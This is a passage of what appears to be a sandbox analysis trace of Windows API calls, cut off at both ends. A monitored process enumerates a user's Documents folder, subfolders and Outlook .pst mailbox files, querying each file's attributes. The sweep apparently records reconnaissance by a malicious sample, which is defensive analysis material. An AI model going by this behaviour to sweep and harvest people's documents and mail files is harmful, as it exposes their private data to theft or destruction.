(normalized: "c:\\users\\eebsym5\\documents\\3iwyi.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7b8130, ftCreationTime.dwHighDateTime=0x1d3dd51, ftLastAccessTime.dwLowDateTime=0xf3541060, ftLastAccessTime.dwHighDateTime=0x1d408e6, ftLastWriteTime.dwLowDateTime=0xf3541060, ftLastWriteTime.dwHighDateTime=0x1d408e6, nFileSizeHigh=0x0, nFileSizeLow=0x6efa)) returned 1 [0039.443] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\76uxv GdaUFGtb--clr.odp" (normalized: "c:\\users\\eebsym5\\documents\\76uxv gdaufgtb--clr.odp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb98659c0, ftCreationTime.dwHighDateTime=0x1d411f0, ftLastAccessTime.dwLowDateTime=0x6dd42130, ftLastAccessTime.dwHighDateTime=0x1d4152c, ftLastWriteTime.dwLowDateTime=0x6dd42130, ftLastWriteTime.dwHighDateTime=0x1d4152c, nFileSizeHigh=0x0, nFileSizeLow=0xe2c4)) returned 1 [0039.443] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\8NvSUmdCYkRyn LhLT.ots" (normalized: "c:\\users\\eebsym5\\documents\\8nvsumdcykryn lhlt.ots"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x928ff170, ftCreationTime.dwHighDateTime=0x1d4101d, ftLastAccessTime.dwLowDateTime=0x2fdc9810, ftLastAccessTime.dwHighDateTime=0x1d41132, ftLastWriteTime.dwLowDateTime=0x2fdc9810, ftLastWriteTime.dwHighDateTime=0x1d41132, nFileSizeHigh=0x0, nFileSizeLow=0x18590)) returned 1 [0039.443] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\9yUXY8Y6QJh.ods" (normalized: "c:\\users\\eebsym5\\documents\\9yuxy8y6qjh.ods"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc3e6420, ftCreationTime.dwHighDateTime=0x1d414cb, ftLastAccessTime.dwLowDateTime=0x6bdecf40, ftLastAccessTime.dwHighDateTime=0x1d413cb, ftLastWriteTime.dwLowDateTime=0x6bdecf40, ftLastWriteTime.dwHighDateTime=0x1d413cb, nFileSizeHigh=0x0, nFileSizeLow=0x5d0)) returned 1 [0039.443] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\ABm6.ots" (normalized: "c:\\users\\eebsym5\\documents\\abm6.ots"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5aca550, ftCreationTime.dwHighDateTime=0x1d4159c, ftLastAccessTime.dwLowDateTime=0x6c8b7bd0, ftLastAccessTime.dwHighDateTime=0x1d41b93, ftLastWriteTime.dwLowDateTime=0x6c8b7bd0, ftLastWriteTime.dwHighDateTime=0x1d41b93, nFileSizeHigh=0x0, nFileSizeLow=0xa50)) returned 1 [0039.444] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\Ae6V-x68xHulBAqnmyv.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ae6v-x68xhulbaqnmyv.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64abd660, ftCreationTime.dwHighDateTime=0x1d41186, ftLastAccessTime.dwLowDateTime=0x7fb69c20, ftLastAccessTime.dwHighDateTime=0x1d3b253, ftLastWriteTime.dwLowDateTime=0x7fb69c20, ftLastWriteTime.dwHighDateTime=0x1d3b253, nFileSizeHigh=0x0, nFileSizeLow=0x18088)) returned 1 [0039.444] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\AKoSG19.rtf" (normalized: "c:\\users\\eebsym5\\documents\\akosg19.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6045bb0, ftCreationTime.dwHighDateTime=0x1d41ebe, ftLastAccessTime.dwLowDateTime=0x61596720, ftLastAccessTime.dwHighDateTime=0x1d41da7, ftLastWriteTime.dwLowDateTime=0x61596720, ftLastWriteTime.dwHighDateTime=0x1d41da7, nFileSizeHigh=0x0, nFileSizeLow=0x9570)) returned 1 [0039.444] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\b0MkGEDi.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\b0mkgedi.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e5e4fd0, ftCreationTime.dwHighDateTime=0x1d3d948, ftLastAccessTime.dwLowDateTime=0x2547c640, ftLastAccessTime.dwHighDateTime=0x1d3d8d9, ftLastWriteTime.dwLowDateTime=0x2547c640, ftLastWriteTime.dwHighDateTime=0x1d3d8d9, nFileSizeHigh=0x0, nFileSizeLow=0x11051)) returned 1 [0039.444] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\c0bPbn3eRI.pptx" (normalized: "c:\\users\\eebsym5\\documents\\c0bpbn3eri.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911dd800, ftCreationTime.dwHighDateTime=0x1d41e0c, ftLastAccessTime.dwLowDateTime=0xcf02ccd0, ftLastAccessTime.dwHighDateTime=0x1d42040, ftLastWriteTime.dwLowDateTime=0xcf02ccd0, ftLastWriteTime.dwHighDateTime=0x1d42040, nFileSizeHigh=0x0, nFileSizeLow=0xac75)) returned 1 [0039.444] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0039.445] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.445] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\BPx3bYqOm-C9WtkLE.rtf" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\bpx3byqom-c9wtkle.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91b10670, ftCreationTime.dwHighDateTime=0x1d4137b, ftLastAccessTime.dwLowDateTime=0x31e7ba80, ftLastAccessTime.dwHighDateTime=0x1d410a7, ftLastWriteTime.dwLowDateTime=0x31e7ba80, ftLastWriteTime.dwHighDateTime=0x1d410a7, nFileSizeHigh=0x0, nFileSizeLow=0x3d28)) returned 1 [0039.445] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\Cnlpr30MwlY8sM-K.docx" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\cnlpr30mwly8sm-k.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f144800, ftCreationTime.dwHighDateTime=0x1d41870, ftLastAccessTime.dwLowDateTime=0x3cbc5ac0, ftLastAccessTime.dwHighDateTime=0x1d418f8, ftLastWriteTime.dwLowDateTime=0x3cbc5ac0, ftLastWriteTime.dwHighDateTime=0x1d418f8, nFileSizeHigh=0x0, nFileSizeLow=0x113ec)) returned 1 [0039.445] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\DoGsxAS fzsv3usVcLF.rtf" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\dogsxas fzsv3usvclf.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x236e96a0, ftCreationTime.dwHighDateTime=0x1d41899, ftLastAccessTime.dwLowDateTime=0x5813dc30, ftLastAccessTime.dwHighDateTime=0x1d41141, ftLastWriteTime.dwLowDateTime=0x5813dc30, ftLastWriteTime.dwHighDateTime=0x1d41141, nFileSizeHigh=0x0, nFileSizeLow=0xec6e)) returned 1 [0039.445] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\fw Lp8dvf.odt" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\fw lp8dvf.odt"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86523b70, ftCreationTime.dwHighDateTime=0x1d41ced, ftLastAccessTime.dwLowDateTime=0x886f61e0, ftLastAccessTime.dwHighDateTime=0x1d41233, ftLastWriteTime.dwLowDateTime=0x886f61e0, ftLastWriteTime.dwHighDateTime=0x1d41233, nFileSizeHigh=0x0, nFileSizeLow=0x5724)) returned 1 [0039.446] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\gIp_.odt" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\gip_.odt"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82317100, ftCreationTime.dwHighDateTime=0x1d40fe6, ftLastAccessTime.dwLowDateTime=0xdf0a5890, ftLastAccessTime.dwHighDateTime=0x1d4125e, ftLastWriteTime.dwLowDateTime=0xdf0a5890, ftLastWriteTime.dwHighDateTime=0x1d4125e, nFileSizeHigh=0x0, nFileSizeLow=0xad18)) returned 1 [0039.446] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\JDFcqscJecsJjXXzI0.csv" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\jdfcqscjecsjjxxzi0.csv"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4001b0, ftCreationTime.dwHighDateTime=0x1d41f68, ftLastAccessTime.dwLowDateTime=0x5e9cef90, ftLastAccessTime.dwHighDateTime=0x1d4110c, ftLastWriteTime.dwLowDateTime=0x5e9cef90, ftLastWriteTime.dwHighDateTime=0x1d4110c, nFileSizeHigh=0x0, nFileSizeLow=0xc8a0)) returned 1 [0039.446] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\K 4psb38WGnfz4j.ods" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\k 4psb38wgnfz4j.ods"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7265bbb0, ftCreationTime.dwHighDateTime=0x1d41486, ftLastAccessTime.dwLowDateTime=0xb3ae5730, ftLastAccessTime.dwHighDateTime=0x1d41eb8, ftLastWriteTime.dwLowDateTime=0xb3ae5730, ftLastWriteTime.dwHighDateTime=0x1d41eb8, nFileSizeHigh=0x0, nFileSizeLow=0xce55)) returned 1 [0039.446] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\qd0VlesT.odp" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\qd0vlest.odp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59457300, ftCreationTime.dwHighDateTime=0x1d418c3, ftLastAccessTime.dwLowDateTime=0x81d28c80, ftLastAccessTime.dwHighDateTime=0x1d41c39, ftLastWriteTime.dwLowDateTime=0x81d28c80, ftLastWriteTime.dwHighDateTime=0x1d41c39, nFileSizeHigh=0x0, nFileSizeLow=0x2d05)) returned 1 [0039.447] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\U7s8rdlV5Oggz.ods" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\u7s8rdlv5oggz.ods"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f1ad00, ftCreationTime.dwHighDateTime=0x1d419dc, ftLastAccessTime.dwLowDateTime=0x44d4f2e0, ftLastAccessTime.dwHighDateTime=0x1d416c2, ftLastWriteTime.dwLowDateTime=0x44d4f2e0, ftLastWriteTime.dwHighDateTime=0x1d416c2, nFileSizeHigh=0x0, nFileSizeLow=0x1546b)) returned 1 [0039.447] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\wGvLKkGVV0g.odp" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\wgvlkkgvv0g.odp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7cf3710, ftCreationTime.dwHighDateTime=0x1d41501, ftLastAccessTime.dwLowDateTime=0x1789d5d0, ftLastAccessTime.dwHighDateTime=0x1d419d3, ftLastWriteTime.dwLowDateTime=0x1789d5d0, ftLastWriteTime.dwHighDateTime=0x1d419d3, nFileSizeHigh=0x0, nFileSizeLow=0x17b16)) returned 1 [0039.447] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\XOrkn1xji3i.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\xorkn1xji3i.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5991c0, ftCreationTime.dwHighDateTime=0x1d41166, ftLastAccessTime.dwLowDateTime=0x6650b970, ftLastAccessTime.dwHighDateTime=0x1d41e8f, ftLastWriteTime.dwLowDateTime=0x6650b970, ftLastWriteTime.dwHighDateTime=0x1d41e8f, nFileSizeHigh=0x0, nFileSizeLow=0x6033)) returned 1 [0039.447] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\yvQAWc3evc-ZEpz3Bd.ots" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\yvqawc3evc-zepz3bd.ots"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e1d600, ftCreationTime.dwHighDateTime=0x1d41fa6, ftLastAccessTime.dwLowDateTime=0x3ab85270, ftLastAccessTime.dwHighDateTime=0x1d417fd, ftLastWriteTime.dwLowDateTime=0x3ab85270, ftLastWriteTime.dwHighDateTime=0x1d417fd, nFileSizeHigh=0x0, nFileSizeLow=0x3dc3)) returned 1 [0039.447] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.448] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\gM1Vd.ppt" (normalized: "c:\\users\\eebsym5\\documents\\gm1vd.ppt"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe25ed0, ftCreationTime.dwHighDateTime=0x1d415ac, ftLastAccessTime.dwLowDateTime=0x63636ec0, ftLastAccessTime.dwHighDateTime=0x1d41d35, ftLastWriteTime.dwLowDateTime=0x63636ec0, ftLastWriteTime.dwHighDateTime=0x1d41d35, nFileSizeHigh=0x0, nFileSizeLow=0xc779)) returned 1 [0039.448] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\HhYrj IfrM.xls" (normalized: "c:\\users\\eebsym5\\documents\\hhyrj ifrm.xls"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f3d950, ftCreationTime.dwHighDateTime=0x1d41154, ftLastAccessTime.dwLowDateTime=0x4e5fd670, ftLastAccessTime.dwHighDateTime=0x1d4131d, ftLastWriteTime.dwLowDateTime=0x4e5fd670, ftLastWriteTime.dwHighDateTime=0x1d4131d, nFileSizeHigh=0x0, nFileSizeLow=0x12084)) returned 1 [0039.448] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\IWX6C7HzotP.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\iwx6c7hzotp.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d188770, ftCreationTime.dwHighDateTime=0x1d3f5e6, ftLastAccessTime.dwLowDateTime=0x34b89200, ftLastAccessTime.dwHighDateTime=0x1d3f9e3, ftLastWriteTime.dwLowDateTime=0x34b89200, ftLastWriteTime.dwHighDateTime=0x1d3f9e3, nFileSizeHigh=0x0, nFileSizeLow=0xa090)) returned 1 [0039.448] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\K7zQF8IGt3.docx" (normalized: "c:\\users\\eebsym5\\documents\\k7zqf8igt3.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6893ef0, ftCreationTime.dwHighDateTime=0x1d3f592, ftLastAccessTime.dwLowDateTime=0x7d23d480, ftLastAccessTime.dwHighDateTime=0x1d3cb87, ftLastWriteTime.dwLowDateTime=0x7d23d480, ftLastWriteTime.dwHighDateTime=0x1d3cb87, nFileSizeHigh=0x0, nFileSizeLow=0x9da8)) returned 1 [0039.449] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\kPtXRE8YDE0HhLGDx 5b.ods" (normalized: "c:\\users\\eebsym5\\documents\\kptxre8yde0hhlgdx 5b.ods"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40bd8130, ftCreationTime.dwHighDateTime=0x1d41d99, ftLastAccessTime.dwLowDateTime=0x570e3ac0, ftLastAccessTime.dwHighDateTime=0x1d41d70, ftLastWriteTime.dwLowDateTime=0x570e3ac0, ftLastWriteTime.dwHighDateTime=0x1d41d70, nFileSizeHigh=0x0, nFileSizeLow=0xc441)) returned 1 [0039.449] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my music\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0039.449] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my pictures\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0039.449] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my shapes\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.450] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x3beea730, ftCreationTime.dwHighDateTime=0x1d30236, ftLastAccessTime.dwLowDateTime=0x3beea730, ftLastAccessTime.dwHighDateTime=0x1d30236, ftLastWriteTime.dwLowDateTime=0x3beea730, ftLastWriteTime.dwHighDateTime=0x1d30236, nFileSizeHigh=0x0, nFileSizeLow=0xd8)) returned 1 [0039.451] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my shapes\\_private\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37db50 [0039.451] FindClose (in: hFindFile=0x37db50 | out: hFindFile=0x37db50) returned 1 [0039.451] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.451] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my videos\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0039.452] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\NASF.pps" (normalized: "c:\\users\\eebsym5\\documents\\nasf.pps"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fb940, ftCreationTime.dwHighDateTime=0x1d41e6b, ftLastAccessTime.dwLowDateTime=0x72dc9690, ftLastAccessTime.dwHighDateTime=0x1d419ae, ftLastWriteTime.dwLowDateTime=0x72dc9690, ftLastWriteTime.dwHighDateTime=0x1d419ae, nFileSizeHigh=0x0, nFileSizeLow=0x16992)) returned 1 [0039.452] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\nBj6MQZGi5.rtf" (normalized: "c:\\users\\eebsym5\\documents\\nbj6mqzgi5.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97c0f0, ftCreationTime.dwHighDateTime=0x1d41dd2, ftLastAccessTime.dwLowDateTime=0x32957b60, ftLastAccessTime.dwHighDateTime=0x1d41765, ftLastWriteTime.dwLowDateTime=0x32957b60, ftLastWriteTime.dwHighDateTime=0x1d41765, nFileSizeHigh=0x0, nFileSizeLow=0x14310)) returned 1 [0039.452] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\njWi97PdpRld9j1s9I.docx" (normalized: "c:\\users\\eebsym5\\documents\\njwi97pdprld9j1s9i.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf405f700, ftCreationTime.dwHighDateTime=0x1d3e9f4, ftLastAccessTime.dwLowDateTime=0x34b33b70, ftLastAccessTime.dwHighDateTime=0x1d3e395, ftLastWriteTime.dwLowDateTime=0x34b33b70, ftLastWriteTime.dwHighDateTime=0x1d3e395, nFileSizeHigh=0x0, nFileSizeLow=0x2ba5)) returned 1 [0039.452] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\Np_Z.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\np_z.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49862d00, ftCreationTime.dwHighDateTime=0x1d4122f, ftLastAccessTime.dwLowDateTime=0x566a2ca0, ftLastAccessTime.dwHighDateTime=0x1d4159b, ftLastWriteTime.dwLowDateTime=0x566a2ca0, ftLastWriteTime.dwHighDateTime=0x1d4159b, nFileSizeHigh=0x0, nFileSizeLow=0x887c)) returned 1 [0039.452] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\ocyb6cj90z 0oo5H.docx" (normalized: "c:\\users\\eebsym5\\documents\\ocyb6cj90z 0oo5h.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1839e990, ftCreationTime.dwHighDateTime=0x1d3e8cb, ftLastAccessTime.dwLowDateTime=0x3364cf90, ftLastAccessTime.dwHighDateTime=0x1d3c432, ftLastWriteTime.dwLowDateTime=0x3364cf90, ftLastWriteTime.dwHighDateTime=0x1d3c432, nFileSizeHigh=0x0, nFileSizeLow=0x1766d)) returned 1 [0039.453] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\OJMD.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ojmd.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c1560, ftCreationTime.dwHighDateTime=0x1d3f71e, ftLastAccessTime.dwLowDateTime=0x5d075d50, ftLastAccessTime.dwHighDateTime=0x1d3eddf, ftLastWriteTime.dwLowDateTime=0x5d075d50, ftLastWriteTime.dwHighDateTime=0x1d3eddf, nFileSizeHigh=0x0, nFileSizeLow=0x13001)) returned 1 [0039.453] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\outlook files\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.455] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74e91a80, ftCreationTime.dwHighDateTime=0x1d2fb32, ftLastAccessTime.dwLowDateTime=0x74e91a80, ftLastAccessTime.dwHighDateTime=0x1d2fb32, ftLastWriteTime.dwLowDateTime=0x22d91e60, ftLastWriteTime.dwHighDateTime=0x1d2fb33, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0039.455] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\outlook files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf60f53c0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xf60f53c0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xf61d9c00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0039.456] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.456] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\qlAW n9SCgpzn.pptx" (normalized: "c:\\users\\eebsym5\\documents\\qlaw n9scgpzn.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9726d3c0, ftCreationTime.dwHighDateTime=0x1d41243, ftLastAccessTime.dwLowDateTime=0xf941ee80, ftLastAccessTime.dwHighDateTime=0x1d4115f, ftLastWriteTime.dwLowDateTime=0xf941ee80, ftLastWriteTime.dwHighDateTime=0x1d4115f, nFileSizeHigh=0x0, nFileSizeLow=0x15dab)) returned 1 [0039.456] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\RDyC2wf_34bEF.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\rdyc2wf_34bef.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x596d9f30, ftCreationTime.dwHighDateTime=0x1d42c71, ftLastAccessTime.dwLowDateTime=0x45c2a4d0, ftLastAccessTime.dwHighDateTime=0x1d412bd, ftLastWriteTime.dwLowDateTime=0x45c2a4d0, ftLastWriteTime.dwHighDateTime=0x1d412bd, nFileSizeHigh=0x0, nFileSizeLow=0x429)) returned 1 [0039.456] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\RGyKpkSEjm.docx" (normalized: "c:\\users\\eebsym5\\documents\\rgykpksejm.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x892f1250, ftCreationTime.dwHighDateTime=0x1d41018, ftLastAccessTime.dwLowDateTime=0x4054f780, ftLastAccessTime.dwHighDateTime=0x1d41c3d, ftLastWriteTime.dwLowDateTime=0x4054f780, ftLastWriteTime.dwHighDateTime=0x1d41c3d, nFileSizeHigh=0x0, nFileSizeLow=0x11e26)) returned 1 [0039.456] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\supbcHre0UqfNWkPh.pptx" (normalized: "c:\\users\\eebsym5\\documents\\supbchre0uqfnwkph.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: 